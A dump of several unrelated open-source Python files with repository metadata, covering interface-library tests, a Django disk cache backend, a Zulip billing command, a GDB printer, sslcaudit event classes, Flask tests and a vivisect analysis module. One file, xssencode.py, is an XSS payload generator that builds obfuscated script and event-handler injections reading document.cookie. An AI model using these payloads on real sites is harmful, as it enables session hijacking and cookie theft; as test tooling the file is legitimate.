class AsyncGenFooImplementationFail: # skipcq: PYL-W0612
async def foo(self):
yield 1
@implements(GenFooInterface)
class GenFooImplementation: # skipcq: PYL-W0612
def foo(self): # skipcq: PYL-R0201
yield 1
def test_asyncgen_method():
class AsyncGenFooInterface:
async def foo(self):
yield 1
with pytest.raises(NotImplementedError):
@implements(AsyncGenFooInterface)
class AsyncFooImplementationFail: # skipcq: PYL-W0612
async def foo(self):
pass
with pytest.raises(NotImplementedError):
@implements(AsyncGenFooInterface)
class GenFooImplementationFail: # skipcq: PYL-W0612
def foo(self): # skipcq: PYL-R0201
yield 1
@implements(AsyncGenFooInterface)
class AsyncGenFooImplementation: # skipcq: PYL-W0612
async def foo(self):
yield 1
@py36
def test_new_style_descriptors():
class IntField:
def __get__(self, instance, owner):
return instance.__dict__[self.name]
def __set__(self, instance, value):
if not isinstance(value, int):
raise ValueError('expecting integer in {}'.format(self.name))
instance.__dict__[self.name] = value
def __set_name__(self, owner, name):
self.name = name # skipcq: PYL-W0201
class FooInterface(Interface):
int_field = IntField()
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
pass
@implements(FooInterface)
class FooImplementationPass:
int_field = IntField()
@py36
def test_new_style_metaclasses():
class Polygon:
def __init_subclass__(cls, sides, **kwargs):
cls.sides = sides
if cls.sides < 3:
raise ValueError('polygons need 3+ sides')
@classmethod
def interior_angles(cls):
return (cls.sides - 2) * 180
class PolygonInterface(Interface):
def rotate(self):
pass
@implements(PolygonInterface)
class Triangle(Polygon, sides=3):
def rotate(self):
pass
def test_descriptors_signature_getter():
class FooInterface(Interface):
@property
def someprop(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self) -> int:
pass
def test_descriptors_signature_setter():
class FooInterface(Interface):
@property
def someprop(self):
pass
@someprop.setter
def someprop(self, value: str) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self):
pass
@someprop.setter
def someprop(self, value: int) -> float:
pass
def test_descriptors_signature_deleter():
class FooInterface(Interface):
@property
def someprop(self):
pass
@someprop.deleter
def someprop(self) -> str:
pass
with pytest.raises(NotImplementedError):
@implements(FooInterface)
class FooImplementationFail:
@property
def someprop(self):
pass
@someprop.deleter
def someprop(self) -> int:
pass
def test_get_mro():
class RegularClass:
pass
mro = get_mro(RegularClass)
assert object not in mro
expected = RegularClass.mro()[:-1]
assert mro == expected
def test_class_hierarchy_overlap_of_common_class():
class CommonClass:
pass
class FooInterface(CommonClass):
def abc(self) -> str:
pass
with pytest.raises(ValueError):
@implements(FooInterface)
class FooImplemenation(CommonClass):
def abc(self) -> str:
pass
def test_implementation_inheriting_from_interface():
class FooInterface:
def abc(self) -> str:
pass
with pytest.raises(ValueError):
@implements(FooInterface)
class FooImplemenation(FooInterface):
def abc(self) -> str:
pass
| ksindi/implements | tests.py | Python | mit | 24,860 |
"Django-compatible disk and file backed cache."
from django.core.cache.backends.base import BaseCache
try:
from django.core.cache.backends.base import DEFAULT_TIMEOUT
except ImportError:
# For older versions of Django simply use 300 seconds.
DEFAULT_TIMEOUT = 300
from .fanout import FanoutCache
class DjangoCache(BaseCache):
"Django-compatible disk and file backed cache."
def __init__(self, directory, params):
"""Initialize DjangoCache instance.
:param str directory: cache directory
:param dict params: cache parameters
"""
super(DjangoCache, self).__init__(params)
shards = params.get('SHARDS', 8)
timeout = params.get('DATABASE_TIMEOUT', 0.010)
options = params.get('OPTIONS', {})
self._directory = directory
self._cache = FanoutCache(directory, shards, timeout, **options)
self.memoize = self._cache.memoize
@property
def directory(self):
"""Cache directory."""
return self._directory
def deque(self, name):
"""Return Deque with given `name` in subdirectory.
:param str name: subdirectory name for Deque
:return: Deque with given name
"""
return self._cache.deque(name)
def index(self, name):
"""Return Index with given `name` in subdirectory.
:param str name: subdirectory name for Index
:return: Index with given name
"""
return self._cache.index(name)
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None,
read=False, tag=None, retry=True):
"""Set a value in the cache if the key does not already exist. If
timeout is given, that timeout will be used for the key; otherwise the
default cache timeout will be used.
Return True if the value was stored, False otherwise.
:param key: key for item
:param value: value for item
:param float timeout: seconds until the item expires
(default 300 seconds)
:param int version: key version number (default None, cache parameter)
:param bool read: read value as bytes from file (default False)
:param str tag: text to associate with key (default None)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was added
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
timeout = self.get_backend_timeout(timeout=timeout)
return self._cache.add(key, value, timeout, read, tag, retry)
def get(self, key, default=None, version=None, read=False,
expire_time=False, tag=False, retry=False):
"""Fetch a given key from the cache. If the key does not exist, return
default, which itself defaults to None.
:param key: key for item
:param default: return value if key is missing (default None)
:param int version: key version number (default None, cache parameter)
:param bool read: if True, return file handle to value
(default False)
:param float expire_time: if True, return expire_time in tuple
(default False)
:param tag: if True, return tag in tuple (default False)
:param bool retry: retry if database timeout expires (default False)
:return: value for item if key is found else default
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
return self._cache.get(key, default, read, expire_time, tag, retry)
def read(self, key, version=None):
"""Return file handle corresponding to `key` from Cache.
:param key: Python key to retrieve
:param int version: key version number (default None, cache parameter)
:return: file open for reading in binary mode
:raises KeyError: if key is not found
"""
key = self.make_key(key, version=version)
return self._cache.read(key)
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None,
read=False, tag=None, retry=True):
"""Set a value in the cache. If timeout is given, that timeout will be
used for the key; otherwise the default cache timeout will be used.
:param key: key for item
:param value: value for item
:param float timeout: seconds until the item expires
(default 300 seconds)
:param int version: key version number (default None, cache parameter)
:param bool read: read value as bytes from file (default False)
:param str tag: text to associate with key (default None)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was set
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
timeout = self.get_backend_timeout(timeout=timeout)
return self._cache.set(key, value, timeout, read, tag, retry)
def pop(self, key, default=None, version=None, expire_time=False,
tag=False, retry=True):
"""Remove corresponding item for `key` from cache and return value.
If `key` is missing, return `default`.
Operation is atomic. Concurrent operations will be serialized.
:param key: key for item
:param default: return value if key is missing (default None)
:param int version: key version number (default None, cache parameter)
:param float expire_time: if True, return expire_time in tuple
(default False)
:param tag: if True, return tag in tuple (default False)
:param bool retry: retry if database timeout expires (default True)
:return: value for item if key is found else default
"""
key = self.make_key(key, version=version)
return self._cache.pop(key, default, expire_time, tag, retry)
def delete(self, key, version=None, retry=True):
"""Delete a key from the cache, failing silently.
:param key: key for item
:param int version: key version number (default None, cache parameter)
:param bool retry: retry if database timeout expires (default True)
:return: True if item was deleted
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
self._cache.delete(key, retry)
def incr(self, key, delta=1, version=None, default=None, retry=True):
"""Increment value by delta for item with key.
If key is missing and default is None then raise KeyError. Else if key
is missing and default is not None then use default for value.
Operation is atomic. All concurrent increment operations will be
counted individually.
Assumes value may be stored in a SQLite column. Most builds that target
machines with 64-bit pointer widths will support 64-bit signed
integers.
:param key: key for item
:param int delta: amount to increment (default 1)
:param int version: key version number (default None, cache parameter)
:param int default: value if key is missing (default None)
:param bool retry: retry if database timeout expires (default True)
:return: new value for item on success else None
:raises ValueError: if key is not found and default is None
"""
# pylint: disable=arguments-differ
key = self.make_key(key, version=version)
try:
return self._cache.incr(key, delta, default, retry)
except KeyError:
raise ValueError("Key '%s' not found" % key)
def decr(self, key, delta=1, version=None, default=None, retry=True):
"""Decrement value by delta for item with key.
If key is missing and default is None then raise KeyError. Else if key
is missing and default is not None then use default for value.
Operation is atomic. All concurrent decrement operations will be
counted individually.
Unlike Memcached, negative values are supported. Value may be
decremented below zero.
Assumes value may be stored in a SQLite column. Most builds that target
machines with 64-bit pointer widths will support 64-bit signed
integers.
:param key: key for item
:param int delta: amount to decrement (default 1)
:param int version: key version number (default None, cache parameter)
:param int default: value if key is missing (default None)
:param bool retry: retry if database timeout expires (default True)
:return: new value for item on success else None
:raises ValueError: if key is not found and default is None
"""
# pylint: disable=arguments-differ
return self.incr(key, -delta, version, default, retry)
def has_key(self, key, version=None):
"""Returns True if the key is in the cache and has not expired.
:param key: key for item
:param int version: key version number (default None, cache parameter)
:return: True if key is found
"""
key = self.make_key(key, version=version)
return key in self._cache
def expire(self):
"""Remove expired items from cache.
:return: count of items removed
"""
return self._cache.expire()
def stats(self, enable=True, reset=False):
"""Return cache statistics hits and misses.
:param bool enable: enable collecting statistics (default True)
:param bool reset: reset hits and misses to 0 (default False)
:return: (hits, misses)
"""
return self._cache.stats(enable=enable, reset=reset)
def create_tag_index(self):
"""Create tag index on cache database.
It is better to initialize cache with `tag_index=True` than use this.
:raises Timeout: if database timeout expires
"""
self._cache.create_tag_index()
def drop_tag_index(self):
"""Drop tag index on cache database.
:raises Timeout: if database timeout expires
"""
self._cache.drop_tag_index()
def evict(self, tag):
"""Remove items with matching `tag` from cache.
:param str tag: tag identifying items
:return: count of items removed
"""
return self._cache.evict(tag)
def clear(self, **kwargs):
"Remove *all* values from the cache at once."
# pylint: disable=unused-argument
return self._cache.clear()
def close(self, **kwargs):
"Close the cache connection."
# pylint: disable=unused-argument
self._cache.close()
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""Return seconds to expiration.
:param float timeout: seconds until the item expires
(default 300 seconds)
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
elif timeout == 0:
# ticket 21147 - avoid time.time() related precision issues
timeout = -1
return None if timeout is None else timeout
| pymedusa/SickRage | ext/diskcache/djangocache.py | Python | gpl-3.0 | 11,256 |
from typing import Any
from django.conf import settings
from zerver.lib.management import ZulipBaseCommand
if settings.BILLING_ENABLED:
from corporate.lib.stripe import invoice_plans_as_needed
class Command(ZulipBaseCommand):
help = """Generates invoices for customers if needed."""
def handle(self, *args: Any, **options: Any) -> None:
if settings.BILLING_ENABLED:
invoice_plans_as_needed()
| andersk/zulip | zilencer/management/commands/invoice_plans.py | Python | apache-2.0 | 430 |
import glob
import os
import time
import json
with open('settings.json') as data_file:
settings = json.load(data_file)
input_folder = settings["input_folder"]
output_folder = settings["output_folder"]
output_name = settings["output_name"]
extension = settings["extension"]
custom_sorting = settings["custom_sorting"]
order = settings["indexed_order"]
read_content = ""
if not os.path.exists(input_folder):
print ("input folder doesn't exists... Try again.")
time.sleep(3)
else:
joined_files = glob.glob(input_folder + "/*" + extension)
if custom_sorting:
for i in range(len(order)):
read_file = open(joined_files[order[i]], "r")
read_content += read_file.read() + "\n\n"
read_file.close()
else:
for i in range(len(joined_files)):
read_file = open(joined_files[i], "r")
read_content += read_file.read() + "\n\n"
read_file.close()
if not os.path.exists(output_folder):
os.makedirs(output_folder)
returned_file = open(output_folder + "/" + output_name + extension, "w")
returned_file.write(read_content)
returned_file.close()
print ("Done!")
time.sleep(3)
| brunurd/jscompiler.py | sfconcat.py | Python | cc0-1.0 | 1,214 |
from PETScMatOps import *
| wathen/PhD | MHD/FEniCS/MyPackage/PackageName/PETScFunc/__init__.py | Python | mit | 26 |
import random
def randomurl():
chars='abcdefghijklmnopqrstuvwxyz'
length=random.randint(5, 20)
choice=random.choice
return ''.join(choice(chars) for i in range(length))+'.com'
def xssencode(javascript):
javascript2='eval(String.fromCharCode(%s))' % ','.join(str(ord(i)) for i in javascript)
for js in [javascript, javascript2]:
options=['<script>{}</script>',
'<a onmouseover="{}">%s</a>' % (' '*random.randint(0, 250)),
'<dev onmouseover="{}">%s</dev>' % (' '*random.randint(0, 250)),
'<span onmouseover="{}">%s</span>' % (' '*random.randint(0, 250)),
'<img onmouseover="{}" src="#"/>',
'<img onmouseover="{}"/>',
'<img onerror="{}" src="/"/>',
'<img onerror="{}" src="%s"/>' % randomurl(),
'<iframe onmouseover="{}" src="#"></iframe>',
'<body onload={}>',]
for i in options:
i=''.join(a.upper() if random.randint(0,1) else a.lower() for a in i)
i=''.join(a if random.randint(0,1) or a!='>' else ' >' for a in i)
i=''.join(a if random.randint(0,1) or a!=' ' else ' ' for a in i)
yield i.format(js)
if __name__=='__main__':
attack="alert('XSS: '+document.cookie)"
print('\n'.join(xssencode(attack)))
| RaspPiTor/JAPTT | XSS/xssencode.py | Python | mit | 1,283 |
# Pretty-printers for bounds registers.
# Copyright (C) 2013-2016 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gdb.printing
class MpxBound128Printer:
"""Adds size field to a mpx __gdb_builtin_type_bound128 type."""
def __init__ (self, val):
self.val = val
def to_string (self):
upper = self.val["ubound"]
lower = self.val["lbound"]
size = (long) ((upper) - (lower))
if size > -1:
size = size + 1
result = '{lbound = %s, ubound = %s} : size %s' % (lower, upper, size)
return result
gdb.printing.add_builtin_pretty_printer ('mpx_bound128',
'^__gdb_builtin_type_bound128',
MpxBound128Printer)
| thanhphat11/android_kernel_xiaomi_msm8996 | toolchains/share/gdb/python/gdb/printer/bound_registers.py | Python | gpl-2.0 | 1,386 |
# ----------------------------------------------------------------------
# SSLCAUDIT - a tool for automating security audit of SSL clients
# Released under terms of GPLv3, see COPYING.TXT
# Copyright (C) 2012 Alexandre Bezroutchko [email protected]
# ----------------------------------------------------------------------
class ControllerEvent(object):
'''
Base class.
'''
pass
class ConnectionAuditEvent(ControllerEvent):
'''
This is a base class for events produced while auditing individual connections.
'''
def __init__(self, conn, profile):
self.conn = conn
self.profile = profile
def __eq__(self, other):
return (self.__class__ == other.__class__) and (self.__dict__ == other.__dict__)
class ConnectionAuditResult(ConnectionAuditEvent):
'''
This class contains audit results returned by handle() method of subclasses of BaseServerHandler. It
contains the results of the audit of a single connection.
'''
def __init__(self, conn, profile, result):
ConnectionAuditEvent.__init__(self, conn, profile)
self.result = result
def __str__(self):
return 'ConnectionAuditResult(%s, %s)' % (self.profile, self.result)
class SessionStartEvent(ControllerEvent):
'''
This event is generated by ClientServerSessionHandler on very first connection.
It carries the list of test profiles scheduled for this client.
'''
def __init__(self, session_id, profiles):
self.session_id = session_id
self.profiles = profiles
class SessionEndResult(ControllerEvent):
'''
This event is generated by ClientServerSessionHandler after very last connection.
It contains results produced by handle() methods of all client connection auditors, for a single client.
'''
def __init__(self, session_id):
self.session_id = session_id
self.results = []
def add(self, res):
self.results.append(res)
| grwl/sslcaudit | sslcaudit/core/ConnectionAuditEvent.py | Python | gpl-3.0 | 1,966 |
import pytest
from datetime import datetime
from pytest_flask import fixtures
from flask_login import current_user, login_user
from mdt_app.models import User
@pytest.mark.usefixtures('client_class', 'db_session', 'populate_db')
class TestUserModel():
def setup(self):
self.user = User(f_name='test', l_name='user', is_confirmed=True,
username='testuser', email='[email protected]',
password='woop')
def test_password_setter(self):
u = User(password='cat')
assert u.password_hash is not None
def test_no_password_getter(self):
u = User(password='cat')
with pytest.raises(AttributeError):
u.password
def test_password_verification(self):
u = User(password='cat')
assert u.verify_password('cat') is True
assert u.verify_password('dog') is False
def test_password_salts_are_random(self):
u = User(password='cat')
u2 = User(password='cat')
assert u.password_hash != u2.password_hash
def test_repr(self):
u = User(username='Geoff')
assert u.__repr__() == '<User: Geoff>'
def test_load_user(self):
user1 = User.query.first()
login_user(user1)
assert User.load_user(user1.id) == user1
assert current_user == user1 | stefpiatek/mdt-flask-app | tests/unit/test_auth_models.py | Python | mit | 1,339 |
"""
An i386 specific function analysis module that is designed to
attempt to detect the calling convention.
"""
import collections
import vivisect.impemu.monitor as viv_imp_monitor
import vivisect.exc as v_exc
from vivisect.const import *
import vivisect.analysis.generic.switchcase as vag_switch
import envi.archs.i386 as e_i386
regcalls = {
(e_i386.REG_ECX,): ('thiscall', 1),
(e_i386.REG_EAX,): ('bfastcall', 1),
(e_i386.REG_EAX, e_i386.REG_EDX): ('bfastcall', 2),
(e_i386.REG_ECX, e_i386.REG_EDX): ('msfastcall', 2),
(e_i386.REG_EAX, e_i386.REG_ECX, e_i386.REG_EDX): ('bfastcall', 3),
}
# Arrange the same data for a name lookup
empty = collections.defaultdict(lambda x: ('int','arg%d' % x))
argnames = {
'thiscall': {0: ('void *','ecx'),},
'msfastcall': {0: ('int','ecx'), 1: ('int','edx')},
'bfastcall': {0: ('int','eax'), 1: ('int','edx'), 2: ('int','ecx'),},
}
def argcname(callconv, idx):
ret = argnames.get(callconv,empty).get(idx)
if ret is None:
ret = ('int','arg%d' % idx)
return ret
class AnalysisMonitor(viv_imp_monitor.AnalysisMonitor):
def __init__(self, vw, fva):
viv_imp_monitor.AnalysisMonitor.__init__(self, vw, fva)
self.retbytes = None
self.endstack = None
self.addDynamicBranchHandler(vag_switch.analyzeJmp)
self.badops = vw.arch.archGetBadOps()
def prehook(self, emu, op, starteip):
if op in self.badops:
raise v_exc.BadOpBytes(op.va)
viv_imp_monitor.AnalysisMonitor.prehook(self, emu, op, starteip)
# Do return related stuff before we execute the opcode
if op.isReturn():
self.endstack = emu.getStackCounter()
if len(op.opers):
self.retbytes = op.opers[0].imm
def buildFunctionApi(vw, fva, emu, emumon, stkstart):
# More than 40 args? no way...
argc = stackargs = (int(emumon.stackmax) >> 2)
if argc > 40:
emumon.logAnomaly(emu, fva, 'Crazy Stack Offset Touched: 0x%.8x' % emumon.stackmax)
argc = 0
callconv = "cdecl" # Default to cdecl
# see if we have stdcall return bytes
if emumon.retbytes is not None:
callconv = "stdcall"
argc = emumon.retbytes >> 2
stackidx = 0 # arg index of first *stack* arg
# Log registers we used but didn't init
# but don't take into account ebp and esp
emu.uninit_use.pop(e_i386.REG_ESP, None)
emu.uninit_use.pop(e_i386.REG_EBP, None)
undefkeys = list(emu.uninit_use.keys())
undefkeys.sort()
undeflen = len(undefkeys)
if undeflen:
regcall = regcalls.get(tuple(undefkeys))
if regcall is not None:
callconv, addargc = regcall
argc += addargc
vw.setFunctionMeta(fva, "UndefRegUse", undefkeys)
# if we're callee cleanup, make sure we *actually* clean up our space
# otherwise, revert us to caller cleanup
if emumon.endstack:
stkoff = (emumon.endstack - stkstart) >> 2
if callconv in argnames:
# do our stack args line up with what we cleaned up?
if abs(stkoff) != stackargs:
# we're probably caller cleanup then
callconv = callconv + '_caller'
if argc > 64:
callconv = 'unkcall'
argc = 0
# Add argument indexes to our argument names
funcargs = [ argcname(callconv, i) for i in range(argc) ]
api = ('int',None,callconv,None,funcargs)
vw.setFunctionApi(fva, api)
return api
def analyzeFunction(vw, fva):
emu = vw.getEmulator()
emumon = AnalysisMonitor(vw, fva)
stkstart = emu.getStackCounter()
emu.setEmulationMonitor(emumon)
emu.runFunction(fva, maxhit=1)
# Do we already have API info in meta?
# NOTE: do *not* use getFunctionApi here, it will make one!
api = vw.getFunctionMeta(fva, 'api')
if api is None:
api = buildFunctionApi(vw, fva, emu, emumon, stkstart)
rettype,retname,callconv,callname,callargs = api
if callconv == 'unkcall':
return
argc = len(callargs)
cc = emu.getCallingConvention(callconv)
stcount = cc.getNumStackArgs(emu, argc)
stackidx = argc - stcount
baseoff = cc.getStackArgOffset(emu, argc)
# Register our stack args as function locals
for i in range(stcount):
vw.setFunctionLocal(fva, baseoff + ( i * 4 ), LSYM_FARG, i+stackidx)
emumon.addAnalysisResults(vw, emu)
| bat-serjo/vivisect | vivisect/analysis/i386/calling.py | Python | apache-2.0 | 4,460 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.